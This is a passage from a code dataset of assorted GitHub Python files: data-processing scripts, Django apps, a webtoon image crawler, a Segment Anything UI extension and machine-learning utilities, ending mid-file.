+{"seq_id":"42575663937","text":"import subprocess\nfrom tqdm import tqdm\nimport os\nimport yaml\n\n\ndef experiment(cfg, fw, bk):\n\n for backend, conf in bk['BACKENDS'].items():\n print(fw, backend)\n final_dir = os.path.join(cfg['RESULT_DIR'], f\"{fw}_{backend}\")\n os.makedirs(final_dir, exist_ok=True)\n with open(os.path.join(final_dir, f\"{cfg['SCENARIO']}_{cfg['n']}_{cfg['N']}_{conf['T']}.txt\"), \"w\") as f:\n for i in tqdm(range(conf['T'])):\n stdout = subprocess.run([bk['CMD']] + list(map(str, conf['ARGS'])), stdout=subprocess.PIPE, stderr=subprocess.PIPE).stdout\n res = float(str(stdout)[2:-3])\n f.write(str(res) + \"\\n\")\n\n # n = n*2 - 1\n\n # if framework == \"AF\":\n # if backend not in [\"OPENCL_GPU\", \"CUDA\"]:\n # print(\"NOT SUPPORTED BACKEND\")\n # return\n # cmd = \"./src/arrayfire/build/main\"\n # init_file = os.path.join(\"init_states\", f\"explosion_{n}.af\")\n # arguments = [str(n), str(N), init_file, backend]\n # final_dir = os.path.join(results_dir, f\"AF_{backend}\")\n # os.makedirs(final_dir, exist_ok=True)\n # with open(os.path.join(final_dir, f\"exp_{n}_{N}_{times}.txt\"), \"w\") as f:\n # for i in tqdm(range(times)):\n # stdout = subprocess.run([cmd] + arguments, stdout=subprocess.PIPE, stderr=subprocess.PIPE).stdout\n # res = float(str(stdout)[2:-3])\n # f.write(str(res) + \"\\n\")\n\n # if framework == \"CPP\":\n # cmd = \"./src/cpp/main\"\n # init_file = os.path.join(\"init_states\", f\"explosion_{n}.txt\")\n # if backend not in [\"CPU\"]:\n # print(\"NOT SUPPORTED BACKEND\")\n # return\n # arguments = [str(n), str(N), \"8\", init_file]\n # final_dir = os.path.join(results_dir, f\"CPP_{backend}\")\n # os.makedirs(final_dir, exist_ok=True)\n # with open(os.path.join(final_dir, f\"exp_{n}_{N}_{times}.txt\"), \"w\") as f:\n # for i in tqdm(range(times)):\n # stdout = subprocess.run([cmd] + arguments, stdout=subprocess.PIPE, stderr=subprocess.PIPE).stdout\n # res = float(str(stdout)[2:-3])\n # f.write(str(res) + \"\\n\")\n\n\n # if framework == \"PYTORCH\":\n # if backend not in [\"CPU\", \"CUDA\"]:\n # print(\"NOT SUPPORTED BACKEND\")\n # return\n # cmd = \"./src/python/torch_3D.py\"\n # init_file = os.path.join(\"init_states\", f\"explosion_{n}.txt\")\n # arguments = [str(n), str(N), init_file, backend]\n # final_dir = os.path.join(results_dir, f\"PYTORCH_{backend}\")\n # os.makedirs(final_dir, exist_ok=True)\n # with open(os.path.join(final_dir, f\"exp_{n}_{N}_{times}.txt\"), \"w\") as f:\n # for i in tqdm(range(times)):\n # stdout = subprocess.run([cmd] + arguments, stdout=subprocess.PIPE, stderr=subprocess.PIPE).stdout\n # res = float(str(stdout)[2:-3])\n # f.write(str(res) + \"\\n\")\n\n\n # if framework == \"MPI\":\n # if backend not in [\"CPU\", \"OPENCL_GPU\", \"CUDA\", \"OPENCL_GPU_2\", \"CUDA_2\"]:\n # print(\"NOT SUPPORTED BACKEND\")\n # return\n # cmd = [\"/usr/bin/mpirun\"]\n # if backend == \"CPU\":\n # np = 1\n # elif backend in [\"OPENCL_GPU\", \"CUDA\"]:\n # np = 1\n # else:\n # np = 2\n # arguments = [\"-np\", str(np), \"src/mpi/build/mpi_app\" ,str(n), str(N), backend]\n # final_dir = os.path.join(results_dir, f\"MPI_{backend}\")\n # os.makedirs(final_dir, exist_ok=True)\n # with open(os.path.join(final_dir, f\"exp_{n}_{N}_{times}.txt\"), \"w\") as f:\n # for i in tqdm(range(times)):\n # print(cmd + arguments)\n # stdout = subprocess.run(cmd + arguments, stdout=subprocess.PIPE, stderr=subprocess.PIPE).stdout\n # res = float(str(stdout)[2:-3])\n # f.write(str(res) + \"\\n\")\n\nif __name__ == \"__main__\":\n\n def join(loader, node):\n 
seq = loader.construct_sequence(node)\n return ''.join([str(i) for i in seq])\n def nscale(loader, node):\n seq = loader.construct_sequence(node)\n return seq[0] *2 - 1\n\n yaml.add_constructor('!join', join)\n yaml.add_constructor('!nscale', nscale)\n\n with open(\"exp_cfg.yaml\") as f:\n cfg = yaml.load(f)\n\n for fw, bk in cfg[\"FRAMEWORKS\"].items():\n if bk != None:\n try:\n experiment(cfg, fw, bk)\n except:\n continue","repo_name":"PhantomOfTheOpera/UCU_ComputationalFluidDynamics","sub_path":"exp_pipeline.py","file_name":"exp_pipeline.py","file_ext":"py","file_size_in_byte":4505,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35412820551","text":"#!/usr/bin/env python3\n\"\"\"\n Derivative function\n\"\"\"\n\n\ndef poly_derivative(poly):\n \"\"\"\n Returns the derivative of the given poly\n \"\"\"\n if type(poly) is not list or len(poly) == 0:\n return None\n for i in poly:\n if type(i) is not int and type(i) is not float:\n return None\n derivative = []\n for i in range(1, len(poly)):\n derivative.append(poly[i] * i)\n if derivative == []:\n derivative.append(0)\n return derivative\n","repo_name":"IHansen225/holbertonschool-machine_learning","sub_path":"math/calculus/10-matisse.py","file_name":"10-matisse.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28123988478","text":"from django.contrib import admin\nfrom django import forms\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.admin import UserAdmin\nfrom django.utils.html import format_html\nfrom django.urls import reverse\nfrom .models import *\n\nclass UserAdminCustom(UserAdmin):\n list_display = ('email', 'first_name', 'last_name', 'is_staff', 'is_superuser','profile_link')\n\n def profile_link(self, obj):\n url = reverse('admin:users_profile_change', args=[obj.profile.id])\n return format_html('<a href=\"{}\">{}</a>', url, obj.profile)\n\nadmin.site.unregister(User)\nadmin.site.register(User, UserAdminCustom)\n\n\n\n# ##############################################\n# ########## Profile Model Admin ###########\n# ##############################################\n\nclass ProfileForm(forms.ModelForm):\n \"\"\"\n Customize Default Profile form to add queryset\n \"\"\"\n class Meta:\n model = Profile\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(ProfileForm, self).__init__(*args, **kwargs)\n self.fields['country'].queryset = self.fields['country'].queryset.filter(type='Country')\n\n\nclass ProfileAdmin(admin.ModelAdmin):\n \"\"\"\n Customize Default ProfileAdmin\n \"\"\"\n list_display = ('name', 'country', 'organization', 'position','user_link')\n list_filter = ('country',)\n form = ProfileForm\n\n def user_link(self, obj):\n url = reverse('admin:auth_user_change', args=[obj.user.id])\n return format_html('<a href=\"{}\">{}</a>', url, obj.user)\n\n\nadmin.site.register(Profile, ProfileAdmin)\n","repo_name":"iMMAP/rh","sub_path":"users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36827262898","text":"from bs4 import BeautifulSoup\nimport requests\nfrom tqdm import tqdm\nfrom urllib.parse import urlparse, parse_qs\nimport os\nfrom assets import BASE_LIST_URL, BASE_DETAIL_URL, HEADERS, WEBTOON2CONFIG\n\n\nclass NaverWebtoonCrawl:\n def __init__(self, webtoon_name_en: str):\n assert 
webtoon_name_en in list(WEBTOON2CONFIG.keys())\n\n self.webtoon_name_en = webtoon_name_en\n self.webtoon_name_kr = WEBTOON2CONFIG[webtoon_name_en][\"name_kr\"]\n self.id = WEBTOON2CONFIG[webtoon_name_en][\"id\"]\n\n def get_list_html(self, page: int):\n query_params = dict(titleId=self.id, page=page)\n response = requests.get(BASE_LIST_URL, params=query_params, headers=HEADERS)\n html = BeautifulSoup(markup=response.content, features=\"html.parser\")\n return html\n\n def get_detail_html(self, no: int):\n query_params = dict(titleId=self.id, no=no)\n response = requests.get(BASE_DETAIL_URL, params=query_params, headers=HEADERS)\n html = BeautifulSoup(markup=response.content, features=\"html.parser\")\n return html\n\n def get_last_episode_no(self):\n html = self.get_list_html(page=1)\n last_episode_url = html.find(\"td\", {\"class\", \"title\"}).find(\"a\")[\"href\"]\n parsed_url = urlparse(last_episode_url)\n last_episode_no = int(parse_qs(parsed_url.query)[\"no\"][0])\n return last_episode_no\n\n def save_episode_images(self, no: int):\n if not os.path.exists(f\"{self.webtoon_name_en}/{no}/\"):\n os.makedirs(f\"{self.webtoon_name_en}/{no}/\")\n\n html = self.get_detail_html(no=no)\n images = html.find(\"div\", {\"class\", \"wt_viewer\"}).findAll(\"img\")\n\n for idx, image in enumerate(tqdm(images)):\n with open(f\"{self.webtoon_name_en}/{no}/{idx:03d}.jpg\", \"wb\") as file:\n src = requests.get(image[\"src\"], headers=HEADERS)\n file.write(src.content)\n\n def save_all_images(self):\n last_no = self.get_last_episode_no()\n for episode_no in range(1, last_no + 1):\n self.save_episode_images(no=episode_no)\n","repo_name":"SShowbiz/Naver-Webtoon-Crawl","sub_path":"nwc.py","file_name":"nwc.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7843446396","text":"import random\nimport logging\nimport markdown as md\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.contrib import messages\nfrom . 
import util\nfrom .forms import newEntryForm\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef index(request):\n if request.method == \"POST\":\n title = request.POST.get(\"entry\")\n # Empty search input case\n if not title:\n return redirect(\"index\")\n else:\n # Entry found case\n entriesList = list(map(str.lower, util.list_entries()))\n if title.lower() in entriesList:\n title = util.list_entries()[entriesList.index(title.lower())]\n return redirect(\"entry\", title=title)\n else:\n # Entry not found case -> search for case insensitive machtes \n matches = [i for i in entriesList if title.lower() in i]\n matchIndexes = [entriesList.index(i) for i in matches]\n matches = [util.list_entries()[i] for i in matchIndexes]\n return render(request, \"encyclopedia/index.html\", {\n \"entries\": matches}) \n\n return render(request, \"encyclopedia/index.html\", {\n \"entries\": util.list_entries()\n })\n\n\ndef entry(request, title):\n # Check if entry exists\n if title in util.list_entries():\n entryHTML = md.markdown(util.get_entry(title))\n else:\n entryHTML = False\n\n return render(request, \"encyclopedia/entry.html\", {\n \"entry\": entryHTML,\n \"title\": title,\n })\n\n\ndef newPage(request):\n newEntry = newEntryForm()\n if request.method == \"POST\":\n newEntry = newEntryForm(request.POST)\n if newEntry.is_valid():\n title = newEntry.cleaned_data[\"title\"]\n description = newEntry.cleaned_data[\"description\"]\n entriesList = list(map(str.lower, util.list_entries()))\n if title.lower() not in entriesList:\n util.save_entry(title,description)\n return redirect(\"entry\", title=title)\n else:\n messages.error(request, f\"{title} already exists\")\n\n return render(request, \"encyclopedia/newPage.html\", {\n \"form\": newEntry,\n })\n\n\ndef editPage(request, title):\n newEntry = newEntryForm()\n if request.method == \"POST\":\n newEntry = newEntryForm(request.POST)\n if newEntry.is_valid():\n print(\"cleandata POST: \", newEntry.cleaned_data[\"description\"])\n util.save_entry(newEntry.cleaned_data[\"title\"],\n newEntry.cleaned_data[\"description\"])\n return redirect(\"entry\", title=newEntry.cleaned_data[\"title\"])\n\n newEntry.fields['title'].initial = title\n newEntry.fields['description'].initial = util.get_entry(title)\n print(\"Lines here\")\n print(util.get_entry(title))\n return render(request, \"encyclopedia/editPage.html\", {\n \"title\": title,\n \"form\": newEntry\n })\n\n","repo_name":"AndreiLesi/course_webProgramming","sub_path":"Projekt_1/encyclopedia/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34460270028","text":"from Tkinter import *\r\n\r\nmaster = Tk()\r\nmaster.configure(bg='black')\r\nmaster.wm_attributes(\"-topmost\", 1)\r\n\r\nw = Canvas(master, width=150, height=40, bd=0,relief='ridge',)\r\nw.pack()\r\n\r\ncolor = 100\r\nx0 = 2\r\ny0 = 2\r\nx1 = 151\r\ny1 = 2\r\n\r\nwhile y0 < 20 :\r\n r = color\r\n g = color\r\n b = color\r\n rgb = r, g, b\r\n Hex = '#%02x%02x%02x' % rgb\r\n w.create_line(x0, y0, x1, y1,fill=str(Hex), width=1)\r\n color = color - 2\r\n y0 = y0 + 1\r\n y1 = y1 + 1\r\n\r\ncolor = 10\r\n\r\nwhile y0 < 40 :\r\n r = color\r\n g = color\r\n b = color\r\n rgb = r, g, b\r\n Hex = '#%02x%02x%02x' % rgb\r\n w.create_line(x0, y0, x1, y1,fill=str(Hex), width=1)\r\n color = color + 4\r\n y0 = y0 + 1\r\n y1 = y1 + 
1\r\n\r\nw.mainloop()","repo_name":"sainai95/Python-project-builds","sub_path":"check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21630366139","text":"import cv2\nimport numpy as np\n\nLR_IMG = cv2.imread('LR/sloth.bmp')\nDIFF_IMG = cv2.imread('diff/sloth.bmp')\nOUTPUT_PATH = 'result/sloth.bmp'\n\ndef upscale(lrImg, diffImg, outputPath):\n\theight, width = diffImg.shape[:2]\n\tdim = (int(width), int(height))\n\tlrImg = cv2.resize(lrImg, dim, interpolation = cv2.INTER_LINEAR)\n\toutputImage = np.zeros((height,width,3),np.uint8)\n\n\tfor i in range(height):\n\t for j in range(width):\n\t aB, aG, aR = lrImg[i,j]\n\t bB, bG, bR = diffImg[i,j]\n\n\t newB = (int(aB) + int(bB)) % 256\n\t newG = (int(aG) + int(bG)) % 256\n\t newR = (int(aR) + int(bR)) % 256\n\t \t\n\t outputImage[i,j] = [newB,newG,newR]\n\n\tcv2.imwrite(outputPath, outputImage)\n\n\nupscale(LR_IMG, DIFF_IMG, OUTPUT_PATH)","repo_name":"sean-horton/image-diff","sub_path":"apply_diff.py","file_name":"apply_diff.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6091987487","text":"import gc\r\nimport os\r\nimport numpy as np\r\nfrom PIL import Image\r\nimport torch\r\nimport gradio as gr\r\nfrom collections import OrderedDict\r\nfrom modules import scripts, shared\r\nfrom modules.safe import unsafe_torch_load, load\r\nfrom modules.processing import StableDiffusionProcessingImg2Img\r\nfrom modules.devices import device, torch_gc, cpu\r\nfrom segment_anything import SamPredictor, sam_model_registry\r\n\r\n\r\nmodel_cache = OrderedDict()\r\nsam_model_dir = os.path.join(scripts.basedir(), \"models/sam\")\r\nmodel_list = [f for f in os.listdir(sam_model_dir) if os.path.isfile(\r\n os.path.join(sam_model_dir, f)) and f.split('.')[-1] != 'txt']\r\n\r\n\r\nrefresh_symbol = '\\U0001f504' # 🔄\r\n\r\n\r\nclass ToolButton(gr.Button, gr.components.FormComponent):\r\n \"\"\"Small button with single emoji as text, fits inside gradio forms\"\"\"\r\n\r\n def __init__(self, **kwargs):\r\n super().__init__(variant=\"tool\", **kwargs)\r\n\r\n def get_block_name(self):\r\n return \"button\"\r\n\r\n\r\ndef show_mask(image, mask, random_color=False, alpha=0.5):\r\n if random_color:\r\n color = np.concatenate([np.random.random(3), np.array([0.6])], axis=0)\r\n else:\r\n color = np.array([30/255, 144/255, 255/255, 0.6])\r\n image[mask] = image[mask] * (1 - alpha) + 255 * \\\r\n color.reshape(1, 1, -1) * alpha\r\n return image.astype(np.uint8)\r\n\r\n\r\ndef load_sam_model(sam_checkpoint):\r\n model_type = '_'.join(sam_checkpoint.split('_')[1:-1])\r\n sam_checkpoint = os.path.join(sam_model_dir, sam_checkpoint)\r\n torch.load = unsafe_torch_load\r\n sam = sam_model_registry[model_type](checkpoint=sam_checkpoint)\r\n sam.to(device=device)\r\n torch.load = load\r\n return sam\r\n\r\n\r\ndef clear_sam_cache():\r\n model_cache.clear()\r\n gc.collect()\r\n torch_gc()\r\n\r\n\r\ndef refresh_sam_models(*inputs):\r\n global model_list\r\n model_list = [f for f in os.listdir(sam_model_dir) if os.path.isfile(\r\n os.path.join(sam_model_dir, f)) and f.split('.')[-1] != 'txt']\r\n dd = inputs[0]\r\n if dd in model_list:\r\n selected = dd\r\n elif len(model_list) > 0:\r\n selected = model_list[0]\r\n else:\r\n selected = None\r\n return gr.Dropdown.update(choices=model_list, value=selected)\r\n\r\n\r\ndef sam_predict(model_name, 
input_image, positive_points, negative_points):\r\n    print(\"Initializing SAM\")\r\n    image_np = np.array(input_image)\r\n    image_np_rgb = image_np[..., :3]\r\n\r\n    if model_name in model_cache:\r\n        sam = model_cache[model_name]\r\n        if shared.cmd_opts.lowvram:\r\n            sam.to(device=device)\r\n    elif model_name in model_list:\r\n        clear_sam_cache()\r\n        model_cache[model_name] = load_sam_model(model_name)\r\n        sam = model_cache[model_name]\r\n    else:\r\n        raise Exception(\r\n            f\"{model_name} not found, please download model to models/sam.\")\r\n\r\n    predictor = SamPredictor(sam)\r\n    print(f\"Running SAM Inference {image_np_rgb.shape}\")\r\n    predictor.set_image(image_np_rgb)\r\n    point_coords = np.array(positive_points + negative_points)\r\n    point_labels = np.array(\r\n        [1] * len(positive_points) + [0] * len(negative_points))\r\n    masks, _, _ = predictor.predict(\r\n        point_coords=point_coords,\r\n        point_labels=point_labels,\r\n        multimask_output=True,\r\n    )\r\n    if shared.cmd_opts.lowvram:\r\n        sam.to(cpu)\r\n    gc.collect()\r\n    torch_gc()\r\n    print(\"Creating output image\")\r\n    masks_gallery = []\r\n    mask_images = []\r\n\r\n    for mask in masks:\r\n        blended_image = show_mask(image_np, mask)\r\n        masks_gallery.append(Image.fromarray(mask))\r\n        mask_images.append(Image.fromarray(blended_image))\r\n    return mask_images + masks_gallery\r\n\r\n\r\nclass Script(scripts.Script):\r\n\r\n    def title(self):\r\n        return 'Segment Anything'\r\n\r\n    def show(self, is_img2img):\r\n        # TODO: Here I bypassed a bug inside module.img2img line 154, should be scripts_img2img instead.\r\n        # return scripts.AlwaysVisible if is_img2img else False\r\n        return scripts.AlwaysVisible\r\n\r\n    def ui(self, is_img2img):\r\n        # if is_img2img:\r\n        with gr.Accordion('Segment Anything', open=False, elem_id=id('accordion')):\r\n            with gr.Column():\r\n                gr.HTML(value=\"<p>Left click the image to add one positive point (black dot). Right click the image to add one negative point (red dot). 
Left click the point to remove it.</p>\", label=\"Positive points\")\r\n with gr.Row():\r\n model_name = gr.Dropdown(label=\"Model\", elem_id=\"sam_model\", choices=model_list,\r\n value=model_list[0] if len(model_list) > 0 else None)\r\n refresh_models = ToolButton(value=refresh_symbol)\r\n refresh_models.click(\r\n refresh_sam_models, model_name, model_name)\r\n input_image = gr.Image(label=\"Image for Segment Anything\", elem_id=\"sam_input_image\",\r\n show_label=False, source=\"upload\", type=\"pil\", image_mode=\"RGBA\")\r\n dummy_component = gr.Label(visible=False)\r\n mask_image = gr.Gallery(\r\n label='Segment Anything Output', show_label=False, elem_id='sam_gallery').style(grid=3)\r\n run_button = gr.Button(value=\"You cannot preview segmentation because you have not added dot prompt.\", interactive=False, elem_id=\"sam_run_button\")\r\n with gr.Row():\r\n enabled = gr.Checkbox(\r\n value=False, label=\"Copy to Inpaint Upload\", elem_id=\"sam_impaint_checkbox\")\r\n chosen_mask = gr.Radio(label=\"Choose your favorite mask: \", value=\"0\", choices=[\r\n \"0\", \"1\", \"2\"], type=\"index\")\r\n\r\n run_button.click(\r\n fn=sam_predict,\r\n _js='submit_sam',\r\n inputs=[model_name, input_image,\r\n dummy_component, dummy_component],\r\n outputs=[mask_image],\r\n show_progress=False)\r\n return [enabled, input_image, mask_image, chosen_mask]\r\n\r\n def process(self, p: StableDiffusionProcessingImg2Img, enabled=False, input_image=None, mask=None, chosen_mask=0):\r\n if not enabled or input_image is None or mask is None or not isinstance(p, StableDiffusionProcessingImg2Img):\r\n return\r\n p.init_images = [input_image]\r\n p.image_mask = Image.open(mask[chosen_mask + 3]['name'])\r\n","repo_name":"Code-dogcreatior/SAM-segment-selection","sub_path":"scripts/sam.py","file_name":"sam.py","file_ext":"py","file_size_in_byte":6467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15575256907","text":"import os\n\nimport pandas as pd\n\n\ndef create_export_name(file_dir, file_name):\n \"\"\"\n modify principles according to file name\n :param file_dir:\n :param file_name: 监测数据-xx湖x湖-date.csv\n :return:\n \"\"\"\n export_name = ''\n date = file_name.split('_')[2]\n if file_name.__contains__('dushu_inner'):\n export_name = '监测数据-独墅湖内湖-'\n elif file_name.__contains__('dushu_outer'):\n export_name = '监测数据-独墅湖外湖-'\n elif file_name.__contains__('jinji_outer'):\n export_name = '监测数据-金鸡湖外湖-'\n elif file_name.__contains__('jinji_inner'):\n export_name = '监测数据-金鸡湖内湖-'\n\n return file_dir + export_name + date.split('.')[0] + '.csv'\n\n\ndef merge_access_data(file_dir, file_name):\n \"\"\"\n SQL for generate the xlsx file from accessDB:\n SELECT parameterdata.*\n FROM CruiseTask INNER JOIN ParameterData ON CruiseTask.id = ParameterData.taskId\n WHERE cruisetask.id = {};\n :param file_name:\n :return: exported csv similar to 启澄\n \"\"\"\n # read .xlsx file\n df = pd.read_excel(file_dir + file_name)\n drop_list = ['id', 'taskId', 'parameterId']\n\n # drop useless attributes, sort by time and reset index\n df = df.drop(drop_list, axis=1) \\\n .sort_values(by='reportTime') \\\n .reset_index(drop=True)\n\n # rename attributes and find all parameter names\n df.rename(columns={'lon': '经度', 'lat': '纬度', 'reportTime': '时间'}, inplace=True)\n attrs = list(df['parameterName'].unique())\n\n # inner join by report time\n new_df = df[['时间', '经度', '纬度']].drop_duplicates().dropna().reset_index(drop=True)\n for i, attr in enumerate(attrs):\n a = 
df.where(df['parameterName'] == attr).dropna()\n a.rename(columns={'value': attr}, inplace=True)\n a = a[['时间', attr]].drop_duplicates(subset='时间').dropna().reset_index(drop=True)\n\n new_df = pd.merge(new_df, a, how='inner', on='时间')\n new_df.rename(columns={'氨氮': '氨氮值', '深度(m)': '低频水深(m)'}, inplace=True)\n\n # save as csv\n save_dir = './datasets/temp1/'\n export_name = create_export_name(save_dir, file_name)\n new_df.to_csv(export_name, index=False, encoding='utf_8_sig')\n\n\ndef merge_access_data_all(file_dir):\n \"\"\"\n :param file_dir: './datasets/temp/'\n :return:\n \"\"\"\n for file in os.listdir(file_dir):\n # print(create_export_name('./datasets/temp1/', file))\n merge_access_data(file_dir, file)\n\n\ndef delete_rows(file_dir):\n for file in os.listdir(file_dir):\n df = pd.read_csv(file_dir + file, header=2)\n df['时间'] = pd.to_datetime(df['时间'])\n df.to_csv(file_dir + file, index=False, encoding='utf_8_sig')\n # print(file)\n\n\ndef get_mean_stat(file_dir):\n attrs = ['溶解氧(mg/L)', '总溶解固体', '温度', '藻蛋白',\n '盐度', '浊度', '电导率', '叶绿素', 'PH值']\n stat = pd.DataFrame()\n for file in os.listdir(file_dir):\n loc_date = file.split('-')[1] + file.split('-')[2].split('.')[0]\n try:\n df = pd.read_csv(file_dir + file).dropna()\n desc = df[attrs].describe()\n mean_ = desc.iloc[1, :]\n mean_.name = loc_date\n stat = stat.append(mean_)\n # print(file + ' finished')\n except (KeyError):\n print(file + ' failed')\n stat.to_csv('./datasets/mean_stat1.csv', index=True, encoding='utf_8_sig')\n\n\ndef split_data():\n file_name = './datasets/监测数据/监测数据-独墅_金鸡-20220701.csv'\n dushu = '2022-07-01 11:34:08'\n jinji = '2022-07-01 11:43:50'\n date = file_name.split('-')[2]\n d_name = './datasets/监测数据/监测数据-' + file_name.split('-')[1].split('_')[0] + '-' + date\n j_name = './datasets/监测数据/监测数据-' + file_name.split('-')[1].split('_')[1] + '-' + date\n df = pd.read_csv(file_name)\n\n d_index = df[df['时间'] == dushu].index.values[0]\n j_index = df[df['时间'] == jinji].index.values[0]\n df_dushu = df.iloc[0: d_index].reset_index(drop=True).dropna()\n df_jinji = df.iloc[j_index:].reset_index(drop=True).dropna()\n\n df_dushu.to_csv(d_name, index=False, encoding='utf_8_sig')\n df_jinji.to_csv(j_name, index=False, encoding='utf_8_sig')\n\n\nfile_dir = './datasets/监测数据1/'\nget_mean_stat(file_dir)\n","repo_name":"LesterDawn/personalProjects","sub_path":"blue_green_algae/comparision.py","file_name":"comparision.py","file_ext":"py","file_size_in_byte":4416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20655179330","text":"from contextlib import contextmanager\nfrom os.path import getsize, basename\nfrom tqdm import tqdm\n\n\n@contextmanager\ndef tqdm_open(filename, encoding='utf8'):\n total = getsize(filename)\n\n def wrapped_line_iterator(fd):\n with tqdm(total=total, unit=\"B\", unit_scale=True, desc=basename(filename), miniters=1) as pb:\n processed_bytes = 0\n for line in fd:\n processed_bytes += len(line)\n if processed_bytes >= 1024 * 1024:\n pb.update(processed_bytes)\n processed_bytes = 0\n yield line\n pb.update(processed_bytes)\n\n with open(filename, encoding=encoding) as fd:\n yield wrapped_line_iterator(fd)","repo_name":"IlyaGusev/UNMT","sub_path":"utils/tqdm.py","file_name":"tqdm.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"37"} +{"seq_id":"12796096947","text":"# read tif - scale up - save as ome-tiff\nfrom time import time\nimport pyvips\nimport os\n\ndef 
tif2ometiff(impth,rsf=1):\n    start = time()\n    imobj = pyvips.Image.new_from_file(impth)\n    # resize image\n    imobj = imobj.resize(rsf,kernel='nearest')\n    if imobj.hasalpha(): imobj = imobj[:-1]\n    # split grayscale to zstack of binary\n\n\n    image_height = imobj.height\n    image_width = imobj.width\n    image_bands = imobj.bands\n    imobj = imobj.copy()\n    imobj.set_type(pyvips.GValue.gint_type, \"page-height\", image_height)\n    imobj.set_type(pyvips.GValue.gstr_type, \"image-description\",\n                     f\"\"\"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n                     <OME xmlns=\"http://www.openmicroscopy.org/Schemas/OME/2016-06\"\n                         xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n                         xsi:schemaLocation=\"http://www.openmicroscopy.org/Schemas/OME/2016-06 http://www.openmicroscopy.org/Schemas/OME/2016-06/ome.xsd\">\n                         <Image ID=\"Image:0\">\n                             <!-- Minimum required fields about image dimensions -->\n                             <Pixels DimensionOrder=\"XYCZT\"\n                                     ID=\"Pixels:0\"\n                                     SizeC=\"{image_bands}\"\n                                     SizeT=\"1\"\n                                     SizeX=\"{image_width}\"\n                                     SizeY=\"{image_height}\"\n                                     SizeZ=\"1\"\n                                     Type=\"uint8\">\n                             </Pixels>\n                         </Image>\n                     </OME>\"\"\")\n    end = time()\n    print('elapsed {} sec'.format(round(end-start)))\n    return imobj\n\n\nif __name__ == '__main__':\n    src = '/Volumes/Digital pathology image lib/JHU/Laura Wood/BTC project/230501 BTC patient002/DLTL run1/DLTLprocess_single/ImAnnotationbyCNN_run2'\n    imnm = 'z-0053_2023-03-30 13.48.54_DLAnnMap_1.tif'\n    outnm = imnm.replace('tif','ome.tiff')\n\n    impth = os.path.join(src,imnm)\n    ometiff = tif2ometiff(impth,rsf=4)\n\n    #Compression Types: jpeg,jp2k,lzw\n    # choose jpeg to save space\n    # choose lzw for lossless compression of tissue segmentation map\n    # don't use jp2k. its behavior is a bit weird for now\n    ometiff.tiffsave(os.path.join(src,outnm), compression=\"lzw\", tile=True,\n                     tile_width=512, tile_height=512,\n                     pyramid=True, subifd=True)\n","repo_name":"Wirtz-Lab/wsi_analysis","sub_path":"kyu/complete/tif2ometif.py","file_name":"tif2ometif.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5014908802","text":"from django.db import models\nfrom imagekit.models import ProcessedImageField\nfrom imagekit.processors import Thumbnail\nfrom django.conf import settings\n\n# Create your models here.\n# Profile\nclass Profile(models.Model):\n    nickname = models.CharField(max_length=20, blank=True)\n    image = ProcessedImageField(\n        blank=True,\n        processors=[\n            Thumbnail(300,300),\n        ],\n        format='png', \n    )\n    user = models.OneToOneField(settings.AUTH_USER_MODEL, on_delete=models.CASCADE) # one-to-one\n    # CASCADE: when the user is deleted, the profile record is deleted as well.","repo_name":"Kyeonga-Kim/TIL","sub_path":"Web/Django/formclass/accounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"7896541712","text":"from models import metrics, prepare_data\r\nimport numpy as np\r\nfrom table import draw_plot\r\nfrom sksurv.ensemble import ComponentwiseGradientBoostingSurvivalAnalysis\r\nfrom sklearn.model_selection import GridSearchCV\r\n\r\nX_train, y_train, X_test, y_test = prepare_data.get_train_test()\r\n\r\nrandom_state = 64\r\n\r\nparam_grid = {\r\n    'loss': ['ipcwls', 'coxph', 'squared'],\r\n    'learning_rate': [0.05, 0.1],\r\n    'n_estimators' : [100, 500, 1000],\r\n    'dropout_rate' : [0.0, 0.1]\r\n}\r\n\r\ncwgbs = ComponentwiseGradientBoostingSurvivalAnalysis(random_state=random_state)\r\n\r\nCV_cwgbs = GridSearchCV(estimator=cwgbs, 
